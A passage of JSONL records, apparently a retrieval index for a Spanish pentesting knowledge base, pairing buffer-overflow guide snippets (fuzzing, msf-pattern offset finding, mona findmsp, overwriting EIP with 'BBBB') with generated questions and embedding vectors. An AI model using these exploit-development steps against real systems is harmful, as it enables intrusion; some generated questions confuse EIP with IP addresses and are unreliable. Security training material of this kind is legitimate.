Python que envΓ­a buffers crecientes (+100 bytes) hasta que la app casca.", "indexar": "con que puedo hacer fuzzing para ver cuando una aplicaciΓ³n deja de funcionar?", "v": [-0.10478, 0.2299, -0.26032, -0.00751, 0.0597, 0.04964, -0.07917, 0.04637, 0.00049, -0.08868, -0.16558, -0.09728, -0.08631, 0.07777, -0.02933, -0.05001, -0.03126, -0.07509, -0.04047, 0.03599, -0.0025, -0.00253, -0.09739, -0.11828, -0.16518, 0.18409, 0.06367, -0.06018, -0.16561, -0.16903, 0.05145, -0.0406, 0.11333, -0.03887, -0.01821, 0.03706, 0.05559, -0.00819, 0.01582, 0.04687, 0.00796, 0.12369, -0.11811, 0.07048, -0.02893, 0.02778, 0.03367, -0.13698, -0.06282, 0.07048, -0.03734, -0.06444, -0.02096, 0.01491, -0.06238, -0.0519, 0.00916, -0.15334, 0.02735, 0.01697, -0.03118, -0.023, -0.01363, 0.05278, 0.06165, -0.0768, 0.09866, 0.05081, 0.0205, 0.11755, -0.0662, 0.06302, -0.11004, -0.06367, 0.02017, 0.09071, -0.00803, -0.05611, 0.01745, 0.04243, 0.04359, 0.0547, -0.04088, 0.03767, 0.00914, -0.11631, 0.02291, -0.08118, 0.04987, -0.07854, -0.03339, 0.13146, -0.02497, 0.00173, 0.09173, 0.00899, 0.02708, -0.0098, 0.01602, 0.07375, 0.13144, -0.05397, -0.05696, -0.01375, -0.04019, -0.06522, 0.17901, -0.05325, -0.01718, -0.03801, -0.00364, -0.07353, -0.04212, -0.03411, -0.0775, -0.00845, -0.07149, -0.09155, -0.00584, 0.03545, -0.04574, -0.06783, 0.03242, -0.06995, 0.10831, 0.00183, 0.01904, 0.07367, -0.00854, 0.08417, 0.01296, -0.03953, -0.07501, 0.01049, 0.00698, 0.00357, 0.05679, -0.00715, 0.00109, -0.06874, 0.07145, 0.02366, 0.04072, 0.00311, 0.06763, -0.01764, -0.03149, -0.00401, -0.04578, -0.00588, 0.05694, -0.08117, -0.03399, 0.04663, -0.08741, -0.05423, 0.08388, 0.0077, 0.00432, -0.01268, 0.02745, 0.04332, -0.09595, 0.0199, -0.02392, -0.04624, -0.01281, -0.02329, 0.06998, 0.03613, -0.00166, 0.05824, 0.03519, -0.04773, 0.08114, -0.05956, -0.0631, 0.02098, 0.08045, -0.06688, 0.02144, 0.00622, 0.01193, -0.00479, 0.05701, -0.06554, -0.02041, -0.01425, -0.04712, 0.04225, -0.01275, 0.03267, 0.00168, 0.06703, 0.04357, -0.03796, 0.02058, -0.00465, -0.06226, -0.03592, -0.01388, -0.0735, -0.02837, -0.04811, 0.02103, 0.03734, -0.03603, 0.07456, -0.03774, -0.00377, 0.00986, 0.0188, 0.05442, 0.07974, -0.02696, -0.00105, 0.0277, 0.00157, 0.0171, -0.06216, 0.01013, -0.00043, 0.01489, 0.01251, -0.04092, -7e-05, 0.03272, -0.00158, 0.00208, 0.02786, -0.00318, -0.01386, 0.00223, -0.03179, 0.01162, -0.01059, 0.01131, -0.00239, -0.07014, -0.06106, -0.04903, 0.05324, 0.0382, 0.02536, 0.00277, -0.02543, -0.05865, -0.01071, -0.04617, -0.06998, -0.02329, 0.04205, 0.08689, -0.00814, 0.04834, 0.00535]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 1. Fuzzing β€” encontrar el crash\nScript Python que envΓ­a buffers crecientes (+100 bytes) hasta que la app casca.", "indexar": "cual es un script de python para enviar buffers crecientes y encontrar errores?", "v": [0.13006, 0.01362, -0.02945, -0.10823, 0.01536, -0.17264, -0.04247, -0.06907, -0.0528, -0.12521, -0.11209, 0.00696, -0.06574, -0.05674, -0.04559, -0.08532, -0.12964, 0.03468, 0.17569, -0.06184, -0.04218, 0.00485, -0.06792, -0.13168, -0.07972, 0.11998, -0.07388, -0.01399, -0.11603, -0.0052, 0.09917, 0.03323, 0.10097, 0.06569, -0.13741, -0.0265, 0.07415, 0.06471, -0.08627, 0.17754, -0.00276, 0.03865, -0.04189, 0.06313, -0.038, -0.07176, 0.04992, 0.07046, 0.04474, -0.02887, 0.02211, -0.07221, -0.01861, -0.04658, -0.04948, 0.02213, 0.11227, -0.13824, 0.08289, 0.00078, -0.06179, -0.01154, -0.00121, -0.02366, -0.02188, -0.03549, -0.01452, -0.12428, -0.21971, 0.06658, 0.06032, 0.05917, -0.07192, 0.12875, 0.01424, 0.08395, -0.17312, -0.08168, -0.03425, 0.05799, -0.03763, -0.0914, -0.03967, 0.07363, 0.00072, -0.13778, 0.00368, 0.02076, 0.00653, -0.01942, 0.07815, 0.06547, 0.02928, 0.01898, -0.02658, -0.07848, 0.09927, -0.09463, -0.00399, 0.08123, 0.01649, -0.12638, -0.01081, 0.1221, -0.09327, 0.09401, -0.05569, 0.04967, -0.00944, -0.08986, 0.00087, -0.06497, 0.01752, 0.0473, -0.02054, -0.12214, 0.00273, 0.02998, -0.00434, 0.03355, 0.00026, -0.01974, -0.07453, 0.04327, -0.05238, 0.02924, 0.07043, 0.08508, -0.04695, -0.02025, -0.09048, -0.02324, -0.02655, -0.05663, 0.00334, 0.132, 0.05142, 0.0338, 0.04267, 0.02891, -0.04387, -0.01479, 0.04275, 0.04704, -0.00805, 0.0811, 0.00853, -0.05117, -0.0965, -0.12373, 0.00304, 0.04777, 0.03706, 0.0256, -0.01423, -0.0497, -0.04031, -0.03425, 0.02203, -0.07969, 0.01652, 0.05297, -0.02073, 0.024, 0.05006, -0.11129, -0.00378, 0.0441, 0.05146, 0.01596, -0.00322, -0.04404, 0.0308, -0.10782, 0.01303, -0.07505, 0.01032, -0.03012, -0.06885, -0.02473, 0.04945, -0.03374, -0.00763, 0.08655, 0.06716, -0.02641, 0.06302, 0.03796, 0.00787, 0.00925, 0.0407, 0.03106, -0.0437, -0.05185, 0.01618, 0.01695, 0.03463, 0.00885, 0.04035, -0.06966, 0.00282, 0.02759, -0.02303, 0.02008, 0.01819, 0.01679, -0.03111, -0.0587, -0.02247, -0.0306, 0.04133, -0.02589, 0.05238, -0.03314, -0.0552, -0.02685, -0.02299, 0.09671, -0.00487, -0.04668, -0.05386, -0.02816, 0.0101, -0.02528, -0.04815, 0.00968, 0.05263, -0.01678, 0.00021, 0.00174, -0.0508, 0.03971, -0.07602, -0.03848, 0.013, 0.02305, 0.04362, -0.02845, -0.05286, -0.02531, 0.02077, 0.01101, -0.01256, -0.05451, -0.00358, 0.05197, -0.02724, 0.03076, -0.03779, -0.00794, -0.04212, -0.04506, -0.00383, -0.0351, 0.02273, -0.04091]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 2. Offset β€” posiciΓ³n exacta del EIP\n```bash\nmsf-pattern_create -l 3000 # mΓ‘ndalo como buffer\nmsf-pattern_offset -l 3000 -q 39694438 # el valor que quedΓ³ en EIP", "indexar": "que herramienta sirve para mostrar la posiciΓ³n exacta del puntero de ejecuciΓ³n (EIP)?", "v": [-0.08362, 0.04649, -0.28172, -0.20821, 0.24333, -0.20799, -0.00465, -0.03867, -0.04947, -0.02917, -0.01631, 0.04702, 0.0814, -0.02018, 0.08835, -0.03524, 0.11163, -0.10625, 0.00434, -0.02675, -0.05572, 0.15385, -0.05539, -0.00079, 0.01322, 0.1511, -0.09293, 0.09452, -0.20834, 0.10143, 0.02012, 0.14073, -0.03029, -0.15815, -0.00407, -0.02989, 0.03273, -0.00634, -0.10174, 0.10917, -0.05779, 0.03004, -0.06632, -0.03617, -0.08163, 0.00161, 0.0275, 0.03632, 0.05164, 0.11293, -0.00218, -0.02157, -0.06277, -0.01545, -0.0116, -0.12577, 0.16026, -0.06603, 0.03039, -0.06479, -0.04252, 0.03792, -0.01568, -0.01261, 0.05611, 0.02238, -0.02707, -0.01614, -0.03901, -0.05989, -0.05243, 0.03605, -0.00448, -0.01027, 0.03525, -0.02842, -0.03276, 0.05524, -0.02554, 0.0297, 0.08746, -0.04925, -0.2023, 0.0249, -0.07846, -0.06374, 0.05075, -0.09436, 0.00335, -0.10905, 0.07538, 0.1188, -0.07246, 0.05375, 0.04238, -0.06158, 0.03313, -0.01303, 0.01735, -0.02661, 0.17047, -0.03788, -0.13396, -0.03645, 0.0291, 0.05693, -0.04146, -0.0021, -0.06246, -0.00224, 0.03821, -0.02234, -0.06035, -0.02712, -0.05273, 0.02236, -0.01839, -0.01254, 0.00173, -0.04626, 0.0246, 0.01164, -0.05141, -0.07454, -0.02105, -0.01677, -0.05741, 0.03651, -0.00099, -0.01087, 0.02148, -0.04685, -0.05381, 0.01005, -0.03928, 0.01209, 0.04981, -0.02727, 0.01904, -0.01328, 0.02372, 0.00069, -0.04456, -0.11611, 0.02208, -0.05301, 0.10262, -0.05356, 0.00759, 0.05528, 0.06026, -0.06986, -0.02951, 0.0208, -0.03006, -0.01599, -0.08463, 0.03664, -0.05855, 0.04027, -0.05572, -0.06951, 0.03788, -0.02966, -0.00364, -0.00592, -0.0004, 0.03966, 0.08643, -0.00417, 0.01155, 0.04324, -0.00517, -0.02269, -0.01298, -0.07551, -0.00318, 0.01986, 0.00924, -0.02004, -0.0306, -0.04221, 0.00108, -0.0009, 0.03304, -0.02404, 0.00907, 0.01638, 0.01505, 0.07124, -0.01879, -0.05772, 0.01587, -0.05104, -0.00795, -0.00595, -0.01093, -0.07094, 0.02049, -0.03391, -0.02849, 0.00112, -0.0203, -0.01742, -0.01595, 0.06372, -0.02748, 0.01125, 0.02175, 0.04764, 0.00705, 0.01675, 0.0276, -0.04016, -0.0444, -0.1105, 0.03347, 0.01585, -0.02601, 0.02799, 0.03356, -0.01323, 0.06158, -0.03923, 0.01186, 0.05383, 0.06526, -0.02508, 0.00528, -0.04336, -0.01, 0.02123, -0.03554, 0.017, 0.02217, -0.03001, 0.01348, 0.00448, -0.0362, -0.06242, 0.01135, 0.0643, 0.01249, -0.00288, -0.01653, -0.04453, -0.03561, -0.02166, 0.01005, -0.04228, -0.05104, 0.03661, 0.08592, -0.01247, -0.02633, -0.01844]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 2. Offset β€” posiciΓ³n exacta del EIP\n```bash\nmsf-pattern_create -l 3000 # mΓ‘ndalo como buffer\nmsf-pattern_offset -l 3000 -q 39694438 # el valor que quedΓ³ en EIP", "indexar": "con quΓ© puedo ver dΓ³nde queda guardado un patrΓ³n especΓ­fico en memoria?", "v": [-0.04122, 0.17168, -0.15377, -0.00578, -0.07363, 0.08287, 0.1263, 0.00388, -0.08264, -0.1771, 0.00085, 0.11618, 0.01935, 0.01579, -0.00849, 0.02447, 0.07416, 0.06131, 0.06654, -0.0038, -0.0994, -0.10621, 0.1015, -0.03384, 0.00172, -0.05397, 0.09282, 0.08577, -0.16309, -0.0528, 0.0012, 0.0723, 0.10832, -0.05742, -0.01982, 0.05694, 0.05995, 0.0378, -0.0594, -0.01236, -0.00192, 0.00374, 0.0245, 0.0353, 0.08041, -0.11984, -0.02186, -0.00259, -0.02976, 0.08051, -0.04643, -0.0172, -0.03904, -0.01928, 0.03693, -0.01933, 0.02531, 0.11919, 0.02056, 0.01137, -0.00508, 0.02799, 0.04745, 0.05851, 0.11849, 0.03236, -0.03085, 0.08858, 0.03369, -0.05486, -0.12663, -0.02754, -0.01824, 0.00125, 0.02868, 0.10392, 0.08111, 0.06451, 0.02176, 0.10627, -0.08164, -0.01251, -0.04987, -0.04107, 0.0221, 0.07754, 0.00765, -0.01044, 0.01705, -0.20382, 0.08918, 0.10345, -0.10328, 0.0814, -0.06477, -0.01241, -0.03535, 0.1391, 0.06258, 0.12144, 0.08344, 0.00778, 0.02066, 0.1229, 0.12514, 0.03436, -0.05473, -0.01077, -0.0747, -0.0152, 0.06446, -0.0383, -0.05688, 0.01285, -0.09238, 0.0078, 0.12499, -0.03869, 0.07788, 0.003, 0.00497, -0.00642, 0.01483, -0.03577, 0.00582, 0.01631, -0.0248, 0.09371, -0.01004, 0.02802, -0.14777, 0.05993, -0.02219, -0.11626, -0.02106, 0.08278, -0.04812, 0.081, 0.01833, 0.00373, 0.07941, -0.05184, -0.00366, 0.0306, -0.02566, 0.00867, 0.11825, -0.02901, -0.06888, 0.01221, 0.0365, 0.00284, 0.06836, 0.01179, -8e-05, 0.01916, 0.03554, -0.08545, -0.04253, 0.01353, -0.05654, 0.08423, -0.0547, -0.02345, -0.01162, -0.07022, -0.03572, 0.01409, 0.0788, 0.06432, -0.04761, -0.05735, -0.08197, -0.08337, 0.05776, -0.04628, -0.10856, -0.08032, 0.04202, -0.02369, -0.07473, 0.02357, -0.03624, 0.03331, -0.02418, -0.13995, 0.06856, -0.00121, 0.02677, 0.03164, 0.03421, -0.05036, 0.06738, -0.0746, 0.02993, -0.06581, -0.05788, 0.05875, 0.07874, 0.01096, -0.10914, 0.06859, 0.00838, 0.02158, 0.04128, 0.06219, -0.06819, 0.02309, -0.00429, 0.05721, -0.04939, 0.01332, 0.02013, -0.04412, -0.008, 0.04448, -0.01165, -0.01235, -0.03222, -0.03225, 0.03245, 0.03158, 0.08687, 0.01018, -0.07045, 0.00273, -0.00317, 0.0168, -0.01417, 0.04488, -0.0284, 0.05749, -0.05428, 0.01016, 0.05898, 0.03616, -0.07555, -0.02041, -0.04296, -0.015, -0.00905, 0.06007, -0.05139, 0.00523, -0.05881, -0.04149, -0.04715, 0.07632, -0.00021, -0.02602, 0.01371, 0.01434, 0.04074, -0.09299, 0.03257, -0.04406]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 2. Offset β€” posiciΓ³n exacta del EIP\n```bash\nmsf-pattern_create -l 3000 # mΓ‘ndalo como buffer\nmsf-pattern_offset -l 3000 -q 39694438 # el valor que quedΓ³ en EIP", "indexar": "cual es una alternativa libre a offset para calcular el valor final de EIP?", "v": [0.0175, 0.0993, -0.15999, 0.03265, 0.02498, -0.06354, 0.05249, -0.00146, -0.17721, -0.04702, 0.00333, -0.2478, -0.03698, 0.04342, 0.05576, -0.04034, 0.02784, -0.1254, -0.00092, 0.03299, 0.03259, -0.02063, -0.07588, -0.12702, -0.00814, 0.1266, -0.14546, 0.18989, -0.10521, 0.05755, 0.04135, 0.04853, 0.0451, -0.11363, -0.01876, 0.11871, 0.20639, 0.09979, 0.00759, -0.1227, 0.04913, -0.04383, -0.0387, 0.02606, -0.05876, -0.08969, -0.034, 0.18335, 0.10485, -0.0674, 0.00295, -0.00047, -0.04113, 0.04412, 0.04153, -0.04187, 0.0533, -0.04653, -0.00359, -0.01238, 0.02847, 0.11866, -0.06427, -0.052, 0.02771, -0.03976, -0.06008, 0.0061, -0.04679, 0.0209, 0.0179, 0.00477, -0.04259, -0.01857, -0.00961, -0.03891, -0.04822, -0.06892, 0.09297, -0.07217, -0.06746, -0.06252, -0.07312, -0.00807, -0.05043, -0.05972, 0.10256, -0.09645, 0.01775, 0.03419, -0.03268, 0.00549, 0.00462, 0.09591, -0.12147, -0.18293, 0.07548, 0.06461, -0.12141, 0.07671, 0.07774, 0.0446, -0.12511, -0.0166, 0.08506, 0.07857, -0.01145, 0.03501, -0.00144, -0.01147, 0.03977, 0.0614, -0.02493, -0.01967, -0.0339, -0.0458, -0.00426, 0.09393, -0.02779, 0.02861, -0.00041, 0.02637, -0.03009, -0.10356, 0.06324, 0.00653, 0.04093, 0.09985, 0.07137, 0.07768, -0.03669, -0.01198, -0.1371, -0.08743, -0.01114, -0.06001, 0.05318, -0.03417, 0.02163, 0.07908, 0.03251, -0.04138, -0.01854, -0.12283, 0.04672, -0.0635, 0.01171, -0.02593, -0.07244, -0.02569, -0.0213, -0.03049, -0.03913, 0.12112, -0.02942, 0.01133, -0.1127, -0.00398, -0.05825, 0.1018, -0.03098, -0.01613, 0.07507, -0.04448, 0.04982, -0.05474, 0.01161, 0.02159, -0.02566, -0.04328, 0.02557, 0.04267, 0.02954, -0.05744, 0.03227, -0.09104, -0.03179, -0.04733, -0.00533, -0.02293, 0.0124, 0.00429, -0.05377, -0.00887, 0.00702, 0.08379, 0.04047, 0.06406, 0.0381, 0.05164, -0.0012, 0.01219, 5e-05, -0.02319, -0.04524, 0.00979, -0.01052, -0.07919, -0.02151, -0.07073, -0.00564, -0.0105, -0.012, -0.02592, -0.06324, 0.05138, -0.00895, 0.0359, 0.05012, 0.04487, 0.02012, -0.00822, 0.0194, 0.03447, -0.05762, -0.0073, 0.03847, -0.01346, 0.01088, 0.0204, -0.00396, 0.0099, -0.03517, -0.03421, 0.01858, 0.04529, 0.06564, 0.07914, -0.02586, -0.03424, -0.01547, 0.04019, 0.02913, 0.0067, 0.02523, -0.01704, -0.00188, 0.01251, -0.04315, -0.02639, 0.09035, 0.07421, 0.03781, -0.00204, -0.00148, 0.0049, -0.06467, 0.00713, -0.02256, -0.03402, -0.00251, 0.02822, -0.00224, 0.03084, -0.01942, -0.0082]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa en mona:\n!mona findmsp -distance 3000 # te da \"EIP contains normal pattern ... offset XXXX\"\n```", "indexar": "cual es una herramienta para encontrar patrones normales dentro de direcciones IP?", "v": [0.13911, 0.02297, -0.11363, -0.11508, 0.08705, -0.18429, 0.08396, -0.13965, -0.1146, -0.04202, 0.0323, 0.0129, -0.01419, -0.1382, -0.0139, 0.08036, 0.08149, -0.09137, 0.06654, -0.07897, -0.14672, 0.12421, -0.19983, 0.03936, -0.10028, 0.02586, 0.00347, 0.04856, -0.1531, -0.00961, -0.0815, -0.14187, 0.02386, -0.02415, -0.19099, -0.17249, -0.01348, 0.12067, -0.04817, 0.08366, 0.0506, 0.01161, -0.11104, -0.03474, 0.03971, 0.02985, 0.01557, -0.04948, -0.00108, -0.03305, -0.14319, -0.13362, -0.06423, -0.01242, -0.11207, -0.13718, 0.11238, 0.0241, -0.06111, -0.06462, -0.12004, 0.03117, -0.04108, -0.02392, 0.02093, -0.10619, -0.04799, 0.00121, -0.12522, -0.1061, 0.02537, 0.00821, -0.04203, 0.02887, 0.03731, 0.04618, 0.00476, 0.02578, 0.0384, 0.02498, 0.05876, 0.05376, -0.10926, 0.01397, -0.08065, -0.04123, 0.074, -0.11758, -0.01463, -0.13553, 0.01234, 0.06022, -0.06191, 0.05887, 0.02328, -0.00134, 0.00357, 0.06671, -0.03821, 0.0009, 0.04872, -0.0074, -0.11362, 0.09837, 0.09619, 0.03774, -0.00764, -0.02949, -0.02607, -0.02529, 0.02483, 0.01734, 0.06232, -0.00288, 0.01348, 0.0352, -0.05231, -0.00602, -0.02557, -0.07084, -0.00464, 0.04153, -0.0627, 0.03972, -0.05118, 0.06752, 0.02156, 0.10118, 0.05529, -0.06996, 0.02064, -0.02649, -0.05758, 0.03012, 0.016, 0.01075, 0.02176, -0.06645, 0.02985, -0.00275, 0.06875, -0.05282, -0.00615, -0.07179, 0.08504, -0.02067, 0.03315, -0.07564, -0.08096, 0.01045, -0.00953, 0.04086, 0.01205, 0.01318, -0.03124, 0.0304, -0.08633, -0.02977, -0.02818, -0.00462, 0.00775, -0.05747, 0.09618, -0.08105, 0.01224, -0.05178, -0.04066, 0.00331, 0.07442, -0.03324, 0.01036, 0.01465, -0.02983, -0.02625, -0.01357, -0.09873, -0.11503, -0.05384, 0.07252, -0.0448, 0.03306, 0.02301, -0.02498, -0.02533, 0.05346, -0.0161, 0.11192, -0.01584, -0.01938, 0.03999, 0.03642, -0.01112, -0.00119, -0.02048, 0.03088, -0.02198, -0.01317, -0.08906, -0.01504, -0.05057, -0.06841, 0.02223, -0.06108, -0.03357, 0.07222, 0.01011, -0.07517, -0.04032, -0.04025, 0.02097, 0.00613, -0.02661, 0.02973, -0.0839, -0.08362, 0.00791, -0.02103, -0.01428, -0.0048, 0.0143, 0.02701, -0.00766, 0.05522, -0.04099, -0.02855, 0.00409, -0.01528, 0.02833, 0.031, -0.01286, -0.01257, -0.02669, -0.00081, -0.02538, 0.00558, -0.03797, 0.00507, -0.03465, -0.01685, -0.00793, -0.00684, 0.01813, 0.03391, -0.01317, -0.00575, -0.0177, -0.05658, -0.00741, -0.04222, -0.05481, -0.04042, 0.02009, 0.06568, -0.0227, 0.01126, -0.02824]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa en mona:\n!mona findmsp -distance 3000 # te da \"EIP contains normal pattern ... offset XXXX\"\n```", "indexar": "que programa me sirve para detectar si una direccion contiene un patrΓ³n comΓΊn?", "v": [-0.08003, 0.10343, -0.204, -0.30454, 0.03133, -0.1177, 0.07865, -0.01006, -0.0223, -0.09742, -0.01164, 0.04189, -0.04037, -0.15009, 0.07779, -0.02698, 0.14629, -0.08721, 0.1238, -0.04555, -0.04871, -0.04412, 0.04403, -0.11722, 0.00371, -0.00045, 0.04173, -0.07878, 0.00761, -0.0189, -0.0026, -0.0649, 0.13537, -0.01052, -0.10547, -0.03969, -0.051, -0.045, -0.01622, 0.07836, 0.04477, 0.03393, -0.07584, 0.09102, -0.01288, 0.01612, 0.05579, -0.06127, -0.062, 0.01666, -0.01822, 0.00023, -0.14016, 0.05196, -0.08215, -0.00456, -0.10975, 0.07669, 0.0218, -0.08175, -0.01656, -0.0473, 0.03933, -0.01271, 0.02345, -0.09954, 0.02809, 0.06311, -0.06399, -0.17645, -0.01232, -0.00149, 0.04756, -0.00648, 0.00278, 0.08998, 0.07524, 0.02178, 0.08558, -0.00162, 0.03517, -0.03893, 0.00797, 0.01253, 0.00395, -0.03046, 0.08311, -0.05331, 0.07207, -0.21179, 0.05003, 0.11741, -0.06083, 0.01069, 0.03786, -0.05576, 0.02946, 0.09642, -0.04384, 0.14836, 0.07456, -0.11173, 0.01133, 0.09342, 0.05756, 0.06826, 0.00737, -0.00495, -0.09466, 8e-05, 0.00363, -0.05044, -0.01378, -0.06343, -0.07609, 0.00164, 0.05563, 0.01832, -0.03448, -0.03533, -0.10469, 0.00386, -0.06101, 0.03248, 0.0906, -0.04909, 0.026, 0.09879, 0.01634, 0.05254, -0.08367, -0.00016, 0.00369, -0.01248, -0.05996, 0.03455, 0.01196, -0.01114, -0.02062, 0.00171, 0.0922, 0.05468, 0.02306, 0.04532, 0.00752, -0.00827, 0.12405, -0.12704, -0.03098, 0.03312, 0.01897, 0.08079, 0.03879, 0.01098, 0.03232, -0.04793, 0.06396, -0.00067, -0.05241, -0.01767, 0.00548, 0.01524, 0.0073, -0.1031, 0.08899, -0.05408, -0.00841, -0.05017, 0.10967, 0.07134, -0.0104, -0.00957, 0.04933, -0.06224, -0.01396, -0.00141, -0.05613, -0.08787, 0.06051, -0.00056, -0.05401, 0.03756, 0.05134, 0.0187, -0.02367, -0.06151, 0.03452, 0.01688, -0.00682, -0.03003, 0.05931, -0.06863, 0.02789, -0.0634, 0.04363, 0.02042, -0.0067, 0.00306, 0.02823, -0.02695, -0.07842, 0.00718, 0.02651, 0.02816, 0.0488, 0.05284, -0.05877, 0.00722, 0.06342, 0.11749, -0.03409, -0.00414, 0.04172, -0.00828, -0.05132, -0.00344, -0.01326, 0.02529, 0.06043, 0.0205, -0.03088, -0.04067, 0.0544, 0.04775, -0.02339, -0.03443, -0.02748, -0.01244, 0.10183, 0.02735, 0.03401, -0.03147, 0.01964, 0.00836, -0.01241, -0.05814, -0.04706, -0.00503, -0.00874, -0.05904, -0.0328, 0.02713, 0.0073, -0.03304, 0.0053, 0.05102, 0.00074, -0.04838, -0.01808, 0.02645, -0.05967, 0.0451, 0.06718, -0.06257, 0.04195, 0.02795]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "# alternativa en mona:\n!mona findmsp -distance 3000 # te da \"EIP contains normal pattern ... offset XXXX\"\n```", "indexar": "con que puedo identificar offsets relacionados con direcciones IP en el contexto de EIP?", "v": [0.02153, 0.16036, -0.15688, -0.08768, 0.15946, -0.217, 0.04476, -0.0474, -0.18073, -0.00118, 0.08887, -0.00251, -0.09677, -0.1, 0.047, 0.10664, 0.11096, -0.00032, 0.00051, -0.16798, -0.05559, 0.07261, -0.02862, 0.06474, -0.00598, 0.15331, -0.16643, 0.13314, -0.0797, -0.11398, -0.1611, 0.0187, -0.0665, -0.01061, -0.17548, -0.07415, 0.03648, 0.15646, -0.04561, -0.03266, 0.01034, 0.00513, -0.10979, 0.0377, -0.01223, -0.01161, -0.03788, -0.02603, 0.02899, -0.09882, -0.12288, -0.08432, -0.07925, -0.02403, -0.11036, 0.01115, 0.04846, -0.00054, 0.09209, 0.06923, -0.01408, 0.10439, -0.02936, -0.0161, 0.05147, -0.12194, -0.04965, 0.01628, -0.08298, -0.08649, 0.0151, 0.02062, -0.04867, 0.01647, 0.12612, 0.05807, -0.04187, -0.02793, 0.09261, 0.02061, 0.00943, 0.07068, -0.06484, 0.03908, -0.066, -0.02045, -0.00721, -0.11195, -0.01659, -0.09977, 0.00603, 0.10353, -0.02737, -0.02923, 0.01613, -0.04271, -0.01504, 0.03227, -0.03389, 0.02617, -0.007, 0.07425, -0.13228, 0.06996, 0.12155, 0.04009, 0.06543, -0.02825, 0.09701, -0.00258, -0.14185, -0.01077, -0.0113, -0.04329, 0.04832, -0.04937, 0.0256, 0.00296, 0.08259, -0.01923, -0.02466, -0.03213, 0.02048, -0.00772, -0.00635, 0.06332, 0.00166, 0.13065, 0.10734, 0.02653, -0.02553, 0.00315, -0.03111, 0.00496, 0.05543, 0.06389, 0.01484, 0.00699, 0.04944, 0.06592, 0.07356, -0.09847, 0.02683, -0.05707, 0.0439, -0.07087, 0.01551, -0.11454, -0.0693, 0.0081, -0.00177, 0.01604, -0.01466, 0.04369, 0.00282, 0.02985, -0.01199, -0.03961, 0.02803, -0.03022, -0.03264, -0.01371, 0.04945, -0.01775, 0.06598, 0.00927, -0.04858, 0.01281, 0.09147, 0.01539, -0.03383, 0.04888, -0.04996, -0.02229, -0.0206, -0.04897, -0.01409, -0.01524, -0.0077, 0.00774, -0.03305, -0.03801, 0.02864, -0.01914, 0.0123, 0.00676, 0.03589, 0.02334, 0.0121, 0.02184, 0.0468, 0.0128, 0.00637, 0.02579, 0.03303, -0.07278, -0.02062, 0.00027, -0.06585, -0.04624, -0.02419, -0.00346, -0.02332, -0.04154, -0.00282, 0.05064, -0.09999, 0.03668, -0.02543, -0.03178, -0.00694, -0.02639, 0.07332, -0.04058, -0.10309, 0.0157, 0.04363, -0.00953, 0.01743, 0.01431, -0.00102, 0.01943, 0.04992, -0.01779, 0.0086, 0.01139, 0.01812, -0.01395, 0.03995, -0.02381, -0.0589, 0.07381, -0.07361, -0.03336, 0.04009, -0.00028, -0.00223, -0.03383, -0.03997, -0.02328, 0.03748, -0.00216, -0.0072, -0.02927, 0.00135, -0.06025, -0.07336, 0.05079, -0.02111, -0.04498, -0.02864, 0.03153, 0.00505, -0.00149, -0.00142, -0.00509]} -{"tipo": "pregunta", "herramienta": "Buffer Overflow", "perfil": "PENTESTERS", "fichero": "conocimiento/08 - Avanzado/Buffer Overflow.md", "tema": "avanzado", "fuente": null, "licencia": null, "texto": "### 3. Controlar EIP β€” confirmar\nEnvΓ­a `\"A\"*offset + \"BBBB\"` β†’ en el debugger **EIP = 42424242**. Control confirmado.", "indexar": "que herramienta sirve para controlar el puntero de ejecuciΓ³n en un depurador", "v": [-0.10945, 0.00508, -0.23757, -0.17281, 0.1161, -0.12816, -0.01849, 0.06941, 0.03449, -0.1025, -0.10955, 0.01771, 0.13252, -0.09004, 0.0016, -0.07626, 0.04894, -0.1801, 0.03529, 0.07117, -0.02901, 0.07968, 0.03414, -0.02971, -0.04946, 0.13705, -0.00141, -0.03047, -0.27265, 0.05273, -0.02222, 0.05806, 0.09189, -0.09347, -0.05486, -0.08581, -0.05391, 0.05292, 0.01969, 0.23659, -0.05668, 0.05476, -0.02982, 0.04527, 0.06977, 0.07026, 0.05411, 0.01156, 0.0742, 0.10232, -0.00534, -0.06048, -0.11654, 0.03371, -0.00258, -0.14167, 0.05156, -0.09616, 0.02077, -0.16454, -0.0912, -0.08117, 0.00027, 0.02966, -0.00744, 0.03684, -0.04183, -0.04809, -0.08475, 0.06472, -0.01965, 0.06114, 0.02106, 0.0503, -0.06432, -0.10248, -0.01283, 0.10493, 0.00102, 0.00414, 0.02492, -0.0775, -0.1387, 0.00777, 0.00173, -0.08067, 0.01753, -0.12465, 0.01366, -0.05492, -0.02685, 0.00164, 0.01503, -0.01844, 0.01906, 0.00784, 0.07842, -0.0609, 0.03971, 0.01056, 0.19656, -0.07711, -0.13956, 0.05001, 0.0006, 0.03914, -0.02712, -0.02344, -0.07975, -0.04044, 0.03851, 0.03678, 0.01314, 0.01257, -0.05925, 0.0261, -0.01153, -0.0199, 0.04691, -0.08327, -0.00287, 0.00998, -0.05075, -0.07733, 0.03304, 0.00973, -0.01921, -0.02642, -0.01609, -0.04065, 0.04648, -0.0379, -0.06453, -0.00782, -0.0428, 0.003, 0.04051, -0.0346, -0.01393, -0.02473, -0.01374, 0.07631, 